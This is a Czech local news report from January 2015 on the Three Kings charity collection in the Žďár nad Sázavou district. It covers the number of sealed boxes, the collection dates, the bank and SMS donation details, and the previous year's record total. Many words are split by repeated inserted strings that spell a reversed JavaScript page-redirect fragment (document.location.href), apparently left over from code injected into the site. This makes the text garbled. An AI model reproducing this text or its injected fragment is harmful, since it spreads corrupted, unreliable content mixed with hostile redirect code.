sbírka0
Rainbow page separator

První tříkráloví koledníci vyrazili do ulic

Pondělí, 5. ledna 2015

Tříkrálová sbírka 2015

Žďár nad Sázavou / Tříkrálová sbírka ve žďárském okrese, kterou opět organizuje Oblastní charita Žďár nad Sázavou, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos obsáhne více než tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky měst, obcí a osad. První koledníci vyrazili do ulic i domácností už první lednový víkend.
„Vydali jsme 452 zapečetěných pokladniček s logem Charity České republiky,“ sdělila koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora sbírky z Oblastní charity Žďár nad Sázavou Veronika Dobrovolná.
Celorepubliková Tříkrálová sbírka, kterou le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos už patnáctým rokem pořádá Charita České republiky, potrvá do 14. ledna. V ulicích Žďáru mohou lidé koledníky s kasičkami potkat 6. ledna, do některých domácností pak zavítají o několik dní později ve víkendových dnech.

Tříkrálovou sbírku je kromě osobně darovaných peněz rovněž možné podpořit převodem na bankovní účet číslo 66008822/0800, v. s. 6800 u České spořitelny, nebo zasláním dárcovské SMS ve formě DMS KOLEDA na číslo 87 777. Cena jedné DMS činí 30 korun, charita obdrží 27 korun.
Žďárská charita peníze získané prostřednictvím Tříkrálové sbírky použije na zajištění provozu a rozvoje svých zařízení a na humanitární a mezinárodní pomoc.
Loni se na Žďársku v Tříkrálové sbírce vybralo dosud nejvíce peněz – do 397 kasiček dárci vložili celkem 2 522 626,60 korun. Těmi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to financemi byly podpořeny služby posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované žďárskou chari[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, rekondiční poby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová akce žďárského Klubu v 9, sociální centrum pro seniory v Moldavsku a humanitární pomoc obyvatelům Ukrajiny.00000000000000